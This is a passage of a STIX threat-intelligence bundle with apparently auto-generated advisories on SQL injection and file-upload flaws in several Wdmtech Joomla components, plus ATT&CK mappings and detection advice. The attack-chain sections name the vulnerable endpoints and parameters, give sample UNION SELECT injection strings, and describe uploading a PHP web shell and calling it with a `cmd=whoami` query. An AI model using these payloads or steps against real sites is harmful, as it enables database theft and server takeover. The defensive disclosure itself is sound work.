      "type": "report",
      "spec_version": "2.1",
      "id": "report--6d60d29c-2f7c-5e79-b6a1-b7b7eb13850e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2019-25754: Joomla vRestaurant Unauthenticated SQL Injection",
      "description": "## Overview\n\nJoomla Component vRestaurant version 1.9.4 contains a critical SQL injection vulnerability, identified as CVE-2019-25754, which permits unauthenticated attackers to execute arbitrary SQL queries against the underlying database. This flaw is exploited by sending specially crafted HTTP POST requests to the `menu-listing-layout` endpoint, where malicious SQL payloads are embedded within the `keysearch` parameter. Successful exploitation grants attackers the ability to extract sensitive database information, including table names and other confidential data, posing a significant risk to the integrity and confidentiality of affected Joomla installations. The vulnerability was published on June 19, 2026, and affects instances running the specific vRestaurant component version.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a vulnerable Joomla instance running the vRestaurant component version 1.9.4.\n2.  The attacker crafts an HTTP POST request targeting the `/index.php?option=com_vrestaurant\u0026task=menulisting.menu_listing_layout` endpoint.\n3.  A malicious SQL payload, such as a UNION SELECT statement or a time-based blind injection, is embedded within the `keysearch` parameter in the POST request body.\n4.  The Joomla application, specifically the vRestaurant component, processes the `keysearch` parameter without proper sanitization, leading to the execution of the attacker's arbitrary SQL query.\n5.  The application's response reveals information about the database schema, such as table names, which the attacker parses.\n6.  The attacker refines their SQL injection payloads to extract sensitive data from identified tables, such as user credentials, personal identifiable information (PII), or business records.\n7.  The extracted sensitive information is then exfiltrated by the attacker via the HTTP responses.\n\n## Impact\n\nIf successfully exploited, CVE-2019-25754 allows unauthenticated attackers to gain unauthorized access to the underlying database of affected Joomla websites. This can lead to the full compromise of sensitive data, including user credentials, personal identifiable information (PII), or business-critical records. While specific victim numbers or targeted sectors are not available, any organization utilizing Joomla vRestaurant 1.9.4 is at risk of significant data exfiltration and reputational damage due to a data breach if this vulnerability is not addressed.\n\n## Recommendation\n\n*   Immediately patch `CVE-2019-25754` by updating the Joomla Component vRestaurant to a version beyond 1.9.4 or uninstalling the component if it is not essential.\n*   Deploy the provided `Detects CVE-2019-25754 Exploitation Attempt - Joomla vRestaurant Endpoint` Sigma rule to your SIEM for early detection of exploitation attempts.\n*   Enable comprehensive `webserver` logging for POST request bodies on Joomla web servers or implement a Web Application Firewall (WAF) to capture and inspect SQL injection payloads in parameters like `keysearch`.\n",
      "published": "2026-06-19T18:31:26Z",
      "labels": [
        "joomla",
        "web",
        "sql-injection",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25754"
        },
        {
          "source_name": "reference",
          "url": "http://wdmtech.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/vrestaurant/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/46228"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-vrestaurant-sql-injection-via-menu-listing-layout"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7d7bcd41-595d-5966-bb69-d6a1c91622ce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--36de08fd-bef1-5bca-8445-d1a0a8b2ae9c",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--50585711-5fe6-5c50-88f3-1c52c80f826f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--36de08fd-bef1-5bca-8445-d1a0a8b2ae9c",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Information Repositories",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1213",
          "url": "https://attack.mitre.org/techniques/T1213"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a95383d1-8891-5f2f-8ba4-129f96adb11f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--36de08fd-bef1-5bca-8445-d1a0a8b2ae9c",
      "target_ref": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6d58218a-8a7b-5ad8-8847-2576a0ccb628",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--36de08fd-bef1-5bca-8445-d1a0a8b2ae9c",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--36de08fd-bef1-5bca-8445-d1a0a8b2ae9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla vReview SQL Injection via cmId Parameter (CVE-2019-25755)",
      "description": "## Overview\n\nCVE-2019-25755 details a critical SQL injection vulnerability affecting Joomla Component vReview version 1.9.11, developed by Wdmtech. This flaw enables unauthenticated attackers to execute arbitrary SQL queries against the backend database. By crafting specially designed HTTP POST requests, an attacker can inject malicious URL-encoded SQL UNION statements into the `cmId` parameter when targeting the `editReview` task endpoint. Successful exploitation grants access to sensitive database information, including usernames, passwords, and database version details. This direct access to an organization's database poses a significant risk for data exfiltration, system compromise, and potential for further lateral movement within the network. This vulnerability was published in 2026-06, making immediate patching crucial for affected Joomla installations.\n\n## Attack Chain\n\n1.  **Initial Access**: An unauthenticated attacker identifies a public-facing Joomla web server running the vulnerable vReview component (version 1.9.11 or earlier).\n2.  **Vulnerability Identification**: The attacker identifies the `editReview` task endpoint and the `cmId` parameter as susceptible to SQL injection.\n3.  **Exploitation (SQL Injection)**: The attacker crafts an HTTP POST request, targeting the `/index.php?option=com_vreview\u0026task=editReview` URL, and injects URL-encoded SQL UNION statements into the `cmId` parameter. For example, `cmId=1 UNION SELECT user(),database(),version()--`.\n4.  **Database Query Execution**: The vulnerable vReview component processes the malicious `cmId` input without adequate sanitization, causing the backend database to execute the injected arbitrary SQL queries.\n5.  **Information Disclosure/Collection**: The injected SQL queries are designed to extract sensitive database information, such as user credentials (usernames and passwords) and database version details.\n6.  **Exfiltration**: The results of the executed SQL queries are returned within the HTTP response to the attacker, effectively exfiltrating the sensitive database contents.\n7.  **Impact**: The attacker gains access to critical database information, potentially leading to unauthorized system access, data theft, and further compromise of the organization's infrastructure.\n\n## Impact\n\nA successful exploitation of CVE-2019-25755 leads to the complete compromise of the backend database. Attackers can exfiltrate sensitive data such as customer information, user credentials, and proprietary business data. This can result in severe financial losses, reputational damage, regulatory penalties, and further system compromise through credential reuse. The CVSS v3.1 Base Score of 8.2 (High) indicates the severity of this unauthenticated remote vulnerability, with a high impact on confidentiality and a low impact on integrity and availability, primarily due to the information disclosure capabilities.\n\n## Recommendation\n\n*   **Patch CVE-2019-25755**: Immediately update Joomla Component vReview to a version beyond 1.9.11 or remove the component if it is not actively used, as indicated by the NVD advisory.\n*   **Deploy Sigma Rules**: Implement the provided Sigma rules into your SIEM to detect attempts at exploiting CVE-2019-25755 by monitoring webserver logs for suspicious `POST` requests to `/index.php` containing SQL keywords in the `cs-uri-query`.\n*   **Monitor Webserver Logs**: Enable detailed logging for your web server (e.g., Apache, Nginx) to capture full HTTP request details, including method, URI stem, and query parameters.\n*   **Review `editReview` Endpoint Activity**: Regularly review webserver access logs for anomalous POST requests to the `editReview` task endpoint, especially those with unusual `cmId` parameter values.\n",
      "published": "2026-06-19T18:32:35Z",
      "labels": [
        "joomla",
        "web-exploitation",
        "sql-injection",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25755"
        },
        {
          "source_name": "reference",
          "url": "http://wdmtech.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/clients-a-communities/ratings-a-reviews/vreview/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/46227"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-vreview-sql-injection-via-editreview"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e05c55f6-663f-51b2-9709-971c6d0ee69d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url_path: /vaccount-dashboard/expense",
      "pattern": "[x-ti-bot:url_path = '/vaccount-dashboard/expense']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T18:33:52Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b3c1a093-2975-5693-9e50-765e433a4c66",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b5107349-23e9-52e0-bc2c-70b9013385b6",
      "target_ref": "indicator--e05c55f6-663f-51b2-9709-971c6d0ee69d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--17df0cea-8ab9-5fd9-a22e-aa8ef7c410e8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "parameter: vid",
      "pattern": "[x-ti-bot:parameter = 'vid']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T18:33:52Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9b7291d7-be5d-5c49-b49f-7c62e931f84b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b5107349-23e9-52e0-bc2c-70b9013385b6",
      "target_ref": "indicator--17df0cea-8ab9-5fd9-a22e-aa8ef7c410e8"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bf31b43a-78ab-520a-8b1e-cbdd6d732b86",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b5107349-23e9-52e0-bc2c-70b9013385b6",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--07e5314f-2028-55d0-bf74-57bc88b7ff4d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b5107349-23e9-52e0-bc2c-70b9013385b6",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b5107349-23e9-52e0-bc2c-70b9013385b6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2019-25756: Joomla! vAccount Component SQL Injection Vulnerability",
      "description": "## Overview\n\nCVE-2019-25756 details a critical SQL injection vulnerability affecting the Joomla! Component vAccount version 2.0.2. This flaw enables unauthenticated attackers to execute arbitrary SQL queries against the underlying database. By injecting malicious SQL payloads into the `vid` parameter of HTTP GET requests directed at the `/vaccount-dashboard/expense` endpoint, threat actors can bypass authentication and extract sensitive information, such as database version details and names. The vulnerability carries a CVSS v3.1 Base Score of 8.2 (High), highlighting its potential for severe impact on confidentiality and integrity. Although this CVE was recently published, the component itself was developed by Wdmtech, and its presence on a Joomla! installation exposes the database to potential compromise.\n\n## Attack Chain\n\n1.  **Reconnaissance**: An attacker identifies a target Joomla! website and determines that it is using the vulnerable vAccount component version 2.0.2.\n2.  **Vulnerability Identification**: The attacker leverages public knowledge of CVE-2019-25756, understanding the unauthenticated SQL injection vector.\n3.  **Payload Crafting**: The attacker crafts a malicious SQL injection payload designed to be embedded within the `vid` parameter of an HTTP GET request, targeting information disclosure.\n4.  **Initial Access / Exploitation**: The attacker sends an unauthenticated HTTP GET request to the vulnerable endpoint, `/vaccount-dashboard/expense`, with the crafted SQL payload in the `vid` parameter.\n5.  **SQL Query Execution**: The vulnerable vAccount component processes the request, failing to properly sanitize the input, leading to the execution of the attacker's arbitrary SQL query.\n6.  **Information Collection**: The executed SQL query extracts sensitive information from the underlying database, such as database names, version, or other stored data.\n7.  **Data Exfiltration**: The web application's response to the GET request includes the results of the executed SQL query, allowing the attacker to exfiltrate the collected sensitive database information.\n\n## Impact\n\nSuccessful exploitation of CVE-2019-25756 results in the complete compromise of the confidentiality and integrity of the vulnerable Joomla! application's database. Attackers can exfiltrate sensitive data, including database structure, configuration, and potentially user credentials or other critical business information stored within the database. As the vulnerability is unauthenticated, any internet-facing Joomla! instance running vAccount 2.0.2 is susceptible to immediate data theft without requiring prior access or legitimate user accounts. The high CVSS score reflects the significant risk of data exposure.\n\n## Recommendation\n\n*   **Patch CVE-2019-25756**: Immediately update or remove the Joomla! Component vAccount 2.0.2 to mitigate CVE-2019-25756, as specified by the vendor Wdmtech.\n*   **Deploy Webserver Rule `Detect CVE-2019-25756 Exploitation — vAccount SQLi via vid parameter`**: Deploy the provided Sigma rules to your SIEM/WAF to detect attempts at exploiting the `/vaccount-dashboard/expense` endpoint.\n*   **Deploy Webserver Rule `Detect Joomla vAccount SQLi Keywords in Query`**: Implement the provided Sigma rules to broaden detection for SQL injection keywords targeting the vAccount dashboard, even if the exact parameter or endpoint varies slightly.\n",
      "published": "2026-06-19T18:33:52Z",
      "labels": [
        "sql-injection",
        "web-vulnerability",
        "joomla",
        "cve"
      ],
      "object_refs": [
        "indicator--e05c55f6-663f-51b2-9709-971c6d0ee69d",
        "indicator--17df0cea-8ab9-5fd9-a22e-aa8ef7c410e8",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25756"
        },
        {
          "source_name": "reference",
          "url": "http://wdmtech.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/financial/cost-calculators/vaccount/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/46226"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-vaccount-sql-injection-via-vaccount-dashboard"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cedc7284-61fa-5dda-a38b-bb60a2f9bdea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--107745ce-0672-5802-942c-156ba28b0128",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--16b3b175-7780-5186-ab6f-449c816fe6b2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--107745ce-0672-5802-942c-156ba28b0128",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--107745ce-0672-5802-942c-156ba28b0128",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2019-25757: Joomla vWishlist SQL Injection Vulnerability",
      "description": "## Overview\n\nCVE-2019-25757 describes an SQL injection vulnerability impacting Joomla vWishlist version 1.0.1, a third-party component developed by Wdmtech. This vulnerability allows an authenticated attacker to execute arbitrary SQL queries against the backend database. By crafting malicious POST requests and injecting SQL payloads into the `vproductid` and `userid` parameters, attackers can bypass intended security controls. This grants them the ability to extract sensitive database information, including version numbers and database names, which can then be leveraged for further data exfiltration or to deepen their understanding of the target environment. The vulnerability, first documented in 2019, represents a significant risk for organizations running affected versions of the vWishlist component, as it can lead to unauthorized information disclosure.\n\n## Attack Chain\n\n1.  Attacker obtains valid credentials for a Joomla user account through various means (e.g., brute-forcing, phishing, credential stuffing).\n2.  Attacker logs into the vulnerable Joomla instance using the compromised credentials, gaining authenticated access.\n3.  Attacker crafts a specially designed HTTP POST request targeting the `com_vwishlist` component, specifically the vulnerable endpoints that process `vproductid` and `userid` parameters.\n4.  The malicious request includes SQL injection payloads within the `vproductid` and/or `userid` parameters (e.g., `vproductid=1 UNION SELECT version()--`).\n5.  The Joomla vWishlist component processes the malformed input without proper sanitization, leading to the execution of the injected SQL query by the backend database.\n6.  The database executes the attacker's query, and the results, such as database version or names, are returned within the HTTP response to the attacker.\n7.  Attacker parses the HTTP response to extract the exfiltrated database information.\n8.  Attacker refines subsequent SQL injection payloads to systematically exfiltrate more sensitive data, such as user credentials, configuration details, or other proprietary information.\n\n## Impact\n\nSuccessful exploitation of CVE-2019-25757 allows authenticated attackers to extract sensitive information directly from the backend database. This includes database version details, database names, and potentially more critical data such as user credentials, personally identifiable information (PII), and intellectual property, depending on the database's contents and the attacker's capabilities. The exposure of such data can lead to compliance violations, reputational damage, and further system compromise if exfiltrated credentials are used to access other systems. While the NVD does not specify observed victim counts or targeted sectors, any organization using Joomla vWishlist 1.0.1 is at risk of significant data breaches.\n\n## Recommendation\n\n*   Immediately update the Joomla vWishlist component to a patched version, or uninstall it if no patch is available and it is not critical for business operations.\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect attempts to exploit CVE-2019-25757.\n*   Implement a Web Application Firewall (WAF) with rules specifically designed to detect and block common SQL injection patterns, including those targeting parameters like `vproductid` and `userid`.\n*   Ensure comprehensive web server logging is enabled (`webserver` category) to capture full HTTP request details, including method, URI stem, and query parameters for forensic analysis and rule activation.\n",
      "published": "2026-06-19T18:35:27Z",
      "labels": [
        "sql-injection",
        "joomla",
        "web-application",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25757"
        },
        {
          "source_name": "reference",
          "url": "http://wdmtech.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/extension-specific/virtuemart-extensions/vwishlist/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/46225"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-vwishlist-sql-injection-via-vproductid-parameter"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d8d81762-f0a3-531a-9b4b-a1fc6aa4c197",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ae4ba358-328a-531a-bee0-6d83e4e950ca",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b7b231c9-5a42-5c9c-9856-758aec188c52",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ae4ba358-328a-531a-bee0-6d83e4e950ca",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6ea359c1-595a-5f1c-82f5-854ea0b5e99e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ae4ba358-328a-531a-bee0-6d83e4e950ca",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ae4ba358-328a-531a-bee0-6d83e4e950ca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2019-25758: Joomla! vBizz Unrestricted File Upload Leads to RCE",
      "description": "## Overview\n\nCVE-2019-25758 details an unrestricted file upload vulnerability found in Joomla! Component vBizz version 1.0.7. This flaw permits authenticated attackers to upload arbitrary PHP files to the web server. The vulnerability specifically targets the `profile_pic` parameter within POST requests directed at the application's employee view endpoint. By leveraging this, attackers can bypass typical file type restrictions, store malicious PHP web shells in a publicly accessible `uploads` directory, and subsequently execute them to achieve remote code execution (RCE) on the hosting server. This grants attackers full control over the compromised web server, posing a severe risk for data exfiltration, defacement, or further internal network penetration.\n\n## Attack Chain\n\n1.  An attacker obtains valid credentials and authenticates to the vulnerable Joomla! instance running the vBizz component.\n2.  The attacker crafts a malicious PHP file (webshell), designed to execute arbitrary system commands when accessed.\n3.  The attacker sends an HTTP POST request to a vulnerable endpoint within the vBizz component, such as `/index.php?option=com_vbizz\u0026view=employee\u0026task=save`.\n4.  Within this POST request, the attacker submits the malicious PHP file using the `profile_pic` parameter, bypassing server-side file type validation.\n5.  The vBizz component, due to the vulnerability, saves the malicious PHP file (e.g., `shell.php`) to a publicly accessible `uploads` directory on the web server (e.g., `/images/vbizz/uploads/`).\n6.  The attacker sends a subsequent HTTP GET request to the URL of the newly uploaded webshell (e.g., `/images/vbizz/uploads/shell.php?cmd=whoami`).\n7.  The web server executes the PHP webshell, and the embedded command (e.g., `whoami`) is processed by the underlying operating system.\n8.  The output of the command is returned to the attacker within the HTTP response, confirming Remote Code Execution (RCE) and allowing for further compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2019-25758 leads to full remote code execution on the compromised web server. This allows attackers to perform a wide range of malicious activities, including but not limited to, unauthorized access to sensitive data, installation of backdoors, defacement of the website, establishment of persistent access, and use of the server as a pivot point for further attacks into the internal network. While no specific victim counts or targeted sectors are detailed in the provided source, any organization using the vulnerable Joomla! vBizz component is at risk of severe operational disruption and data breaches.\n\n## Recommendation\n\n*   Patch CVE-2019-25758 by updating the Joomla! vBizz component to a version beyond 1.0.7 or removing it if no longer needed.\n*   Deploy the Sigma rule \"Detect CVE-2019-25758 Exploitation - Malicious PHP Upload Attempt\" to your SIEM and tune for your environment.\n*   Deploy the Sigma rule \"Detect CVE-2019-25758 Exploitation - Web Shell Access from Uploads Directory\" to your SIEM and tune for your environment.\n*   Ensure comprehensive web server access logging is enabled, capturing HTTP methods, URI stems, and query parameters for all requests.\n",
      "published": "2026-06-19T18:36:29Z",
      "labels": [
        "joomla",
        "web-application",
        "rce",
        "unrestricted-file-upload",
        "php"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25758"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/46224"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-vbizz-remote-code-execution"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--78cea7ae-e52d-5e48-bb4e-adb52ebeca1e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d9b3d0b9-ba20-5890-9582-aee38bc03139",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--99eb1b7d-8538-5682-988b-c2339a908af3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d9b3d0b9-ba20-5890-9582-aee38bc03139",
